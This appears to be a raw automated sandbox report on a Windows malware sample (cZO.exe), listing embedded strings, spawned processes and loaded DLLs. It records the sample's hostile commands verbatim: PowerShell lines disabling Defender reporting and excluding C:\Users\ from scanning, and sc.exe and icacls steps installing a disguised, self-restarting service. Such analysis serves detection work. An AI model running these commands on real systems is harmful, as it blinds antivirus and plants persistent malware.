Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: cZO.exeString found in binary or memory: NATS-SEFI-ADD
Source: cZO.exeString found in binary or memory: NATS-DANO-ADD
Source: cZO.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: cZO.exeString found in binary or memory: jp-ocr-b-add
Source: cZO.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: cZO.exeString found in binary or memory: jp-ocr-hand-add
Source: cZO.exeString found in binary or memory: ISO_6937-2-add
Source: unknownProcess created: C:\Users\user\Desktop\cZO.exe "C:\Users\user\Desktop\cZO.exe"
Source: unknownProcess created: C:\Users\user\Desktop\cZO.exe C:\Users\user\Desktop\cZO.exe
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe "C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe"
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\Desktop\cZO.exe C:\Users\user\Desktop\cZO.exeJump to behavior
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe "C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe" Jump to behavior
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignoreJump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.aclJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\cZO.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\cZO.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
